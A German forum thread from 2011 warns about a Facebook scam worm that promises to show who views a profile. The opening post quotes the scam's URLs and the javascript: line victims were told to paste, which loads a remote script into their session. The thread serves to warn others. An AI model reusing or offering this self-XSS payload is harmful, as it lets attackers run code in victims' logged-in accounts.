Alt 26.04.2011, 02:18:10   #1 (permalink)
smf
Euros4you.com
Benutzerbild von smf

ID: 289135
Lose-Remote

Reg: 15.07.2007
Beiträge: 553
smf sorgt für eine eindrucksvolle Atmosphäresmf sorgt für eine eindrucksvolle Atmosphäresmf sorgt für eine eindrucksvolle Atmosphäre
Standard [Facebook] Wurm "WOW Jetzt kannst du sehen wer sich dein Profil ansieht!"

Hallo,
ich habe in letzter Zeit viele EInladungen von Freunden bekommen welche immer lauteten: "WOW Jetzt kannst du sehen wer sich dein Profil ansieht!"
Nun gut, ich hab gleich an eine Verarsche gedacht, da Facebook soetwas 100% angekündigt hätte und man deswegen keine Einladung bekommen hätte.
Trotzdem, habe ich mich mal weiter geschaut.
Oh was sehe ich da:
Code:
1:
http://216.119.153.147/spy.php
Aha! Eine Website ohne Domain und dann auch noch spy.php, hätte hier nicht eine index.php gereicht, welche nicht noch extra spy.php am ende hat?
Naja nun war mir klar es kann nur ein Wurm sein.
Also weiter geforscht. Die Seite verweist je nach dem in welchem Land man ist auf verschiedene Blogs. Blogs = aha da kann nicht viel passieren wenn sie auf Blogspot sind.
Hier für EN:
Code:
1:
http://who-sees-en.blogspot.com/
Hier für DE:
Code:
1:
http://german-spy.blogspot.com/
Hier für ES:
Code:
1:
http://spanish-landing.blogspot.com/
Im Title findet man "Your CPA Page Redirecting.."
CPA? Ist das uns Online Verdienern nicht bekannt?
Es bedeutet: Cost per Action soviel wie die einmalige Auszahlung einer Provision.
Nun gut. Nicht viel passiert, der Programmierer bekommt Geld durch klciks.
Doch das ist noch nicht alles!
Nun soll man dies in die Adresszeile einfügen:
Code:
1:
2:
3:
javascript: (a = (b = document).createElement(‘script’)).src = ‘//iamedwards.com/german.php?’ + Math.random(), b.body.appendChild(a); void(0)
Aha einem Programmierer fällt einem gleich etwas auf: XSS!
Eine XSS ist eine möglichkeit Fremdcode in eine Seite einzubinen. Hacker nutzen dies um ein selbst geschriebenes Script hochzuladen bzw. einzubinden und damit die Daten des Servers auszulesen oder um z.b. Cookies zu stehlen, die der Hacker dann nutzt um sich in Accounts ohne das Passwort einzuloggen.
Dieser Obige Code bindet hier einen Code ein der einem angeblich die Profil Besucher anzeigt. Das Script liest also aus wer die Freunde von einem sind.
Das ganze könnte eig. soweit gehen das es das Passwort auslesen könnte, tut es aber nicht. Der Programmierer oder Hacker ist in diesem sinne ein GreyHat. Er schadet nicht wirklich keinen, nutzt jedoch Schwachstellen aus.
Ein WhiteHat, würde Facebook darauf hinweisen und ein BlackHat die Daten stehlen.
Also erzählt euren Freunden davon, das sie nicht diese Einladung Annehmen sollen und auch sonst auf solch ominösen Tricks rein fallen. Ich selbst kann nicht verstehen das man auf so etwas reinfällt, aber wir sind ja schließlich auf Facebook
smf ist offline   Mit Zitat antworten
Gesponsorte Links
Alt 26.04.2011, 07:13:14   #2 (permalink)
Erfahrener Benutzer
Benutzerbild von Heidi1978

ID: 313487
Lose-Remote

Heidi1978 eine Nachricht über ICQ schicken Heidi1978 eine Nachricht über AIM schicken Heidi1978 eine Nachricht über MSN schicken Heidi1978 eine Nachricht über Yahoo! schicken Heidi1978 eine Nachricht über Skype™ schicken
Reg: 11.03.2008
Beiträge: 224
Heidi1978 wird schon bald berühmt werden
Lächeln

Guten Morgen

Vielen Dank für deine Warnung. Also ich habe sie zum Glück immer abgelehnt.

Gruß Heidi
Heidi1978 ist offline   Mit Zitat antworten
Alt 26.04.2011, 11:25:53   #3 (permalink)
nur zu Besuch
Benutzerbild von huskie-style

ID: 413408
Lose-Remote

huskie-style eine Nachricht über ICQ schicken
Reg: 12.01.2011
Beiträge: 29
huskie-style ist ein sehr geschätzter Menschhuskie-style ist ein sehr geschätzter Menschhuskie-style ist ein sehr geschätzter Menschhuskie-style ist ein sehr geschätzter Mensch
Standard

Für alle Gutgläubigen und Allesklicker sei dieses empfohlen:

https://www.facebook.com/home.php#!/fakepostings
Rotation um die eigene Achse ist keine Fortbewegung!
huskie-style ist offline   Mit Zitat antworten
Alt 26.04.2011, 16:42:18   #4 (permalink)
Neuer Benutzer

Reg: 26.04.2011
Beiträge: 1
funkytown befindet sich auf einem aufstrebenden Ast
Standard

Sehr nervig. Sind schon 700.000 Leute darauf reingefallen. Unglaublich. Hier: http://t.co/X69OX97
funkytown ist offline   Mit Zitat antworten
Antwort

Gesponsorte Links

Anzeige


Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)
 
Themen-Optionen
Ansicht

Forumregeln
Es ist Ihnen nicht erlaubt, neue Themen zu verfassen.
Es ist Ihnen nicht erlaubt, auf Beiträge zu antworten.
Es ist Ihnen nicht erlaubt, Anhänge hochzuladen.
Es ist Ihnen nicht erlaubt, Ihre Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks sind an
Pingbacks sind an
Refbacks sind an


Ähnliche Themen
Thema Autor Forum Antworten Letzter Beitrag
Werde Facebook Fan von "Klamm-Lose" und "Poker Texas Hold'em"-1.5 Mio Lose ganz schnell! philippr84 Lose4SocialMedia 219 02.04.2012 11:28:14
Suche Facebook "likes" und "statusupdates" outrage Lose4Werbung 2 04.02.2011 12:41:13
Dein Ref auf deiner Seite "Auktion" "losegold.de klammzwerg.de klammgeil.de" kasiermuski Suche Werber: Loseseiten 20 23.11.2009 22:35:23
SCHELMISH "Wir werden sehen – Tour 2007" Steeevie Musik 3 02.10.2007 19:30:41


Alle Zeitangaben in WEZ +1. Es ist jetzt 02:43:12 Uhr.